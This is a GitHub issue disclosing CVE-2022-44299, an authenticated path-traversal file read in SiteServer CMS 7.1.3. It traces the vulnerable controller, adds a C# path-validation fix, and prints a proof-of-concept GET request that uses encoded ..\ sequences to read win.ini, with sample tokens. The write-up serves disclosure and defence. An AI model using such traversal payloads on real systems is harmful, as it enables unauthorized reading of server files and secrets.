CVE-2022-44299: background file reading · Issue #3491 · siteserver/cms
SiteServerCMS 7.1.3 sscms has a file read vulnerability.
Vulnerability conditions
SSCMS v7.1.3 + MySQL + administrator privileges
Vulnerability details
- Code analysis found that an arbitrary file read vulnerability exists in the interface /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=
Code analysis process
\SSCMS.Web\Controllers\Admin\Cms\Templates\TemplatesAssetsEditorController.Get.cs
Stepping into this controller shows that the fileName parameter is controllable and is passed into the ReadTextAsync method without any filtering.
Stepping into that method shows that it reads out the file content, resulting in a file read vulnerability.
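One way to close this gap, as an added example that is not SSCMS code or the project's actual fix: canonicalize the requested path and refuse anything that resolves outside the site directory before it reaches a read call such as ReadTextAsync. The names SafePath and ResolveInsideRoot, the sample root and the sample file names are hypothetical.

```csharp
using System;
using System.IO;
using System.Runtime.InteropServices;

// Added example, not SSCMS code. SafePath / ResolveInsideRoot are hypothetical names.
public static class SafePath
{
    // Returns the canonical path of directoryPath/fileName if it stays inside
    // root; throws UnauthorizedAccessException otherwise.
    public static string ResolveInsideRoot(string root, string directoryPath, string fileName)
    {
        // Canonical root with exactly one trailing separator, so that a root of
        // "C:\site" does not also match "C:\site-backup".
        string fullRoot = Path.GetFullPath(root)
            .TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
            + Path.DirectorySeparatorChar;

        // Treat '\' as a separator on every OS: the request in the report sends
        // %5C, which .NET does not treat as a separator on Linux hosts.
        string relative = Path.Combine(directoryPath ?? "", fileName ?? "")
            .Replace('\\', Path.DirectorySeparatorChar);

        // Path.Combine discards fullRoot when 'relative' is rooted, and
        // GetFullPath collapses ".." segments; the prefix check covers both.
        string candidate = Path.GetFullPath(Path.Combine(fullRoot, relative));

        bool windows = RuntimeInformation.IsOSPlatform(OSPlatform.Windows);
        var cmp = windows ? StringComparison.OrdinalIgnoreCase : StringComparison.Ordinal;
        if (!candidate.StartsWith(fullRoot, cmp))
            throw new UnauthorizedAccessException("path escapes site root");
        return candidate;
    }

    public static void Main()
    {
        string root = Path.Combine(Path.GetTempPath(), "site1"); // constructed root
        // Constructed inputs: two legitimate names, a traversal, an absolute path.
        string[] names = { "index.html", @"css\main.css",
                           @"..\..\..\Windows\win.ini", "/outside/secret.txt" };
        foreach (var name in names)
        {
            try { Console.WriteLine($"allow  {name} -> {ResolveInsideRoot(root, "", name)}"); }
            catch (UnauthorizedAccessException) { Console.WriteLine($"reject {name}"); }
        }
    }
}
```

Path.GetFullPath does not resolve symbolic links, so a link placed inside the site directory still needs separate handling.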
Vulnerability verification
After logging in to the admin backend and obtaining administrator credentials, send the following exp request:
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5C…%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826
Accept-Encoding: gzip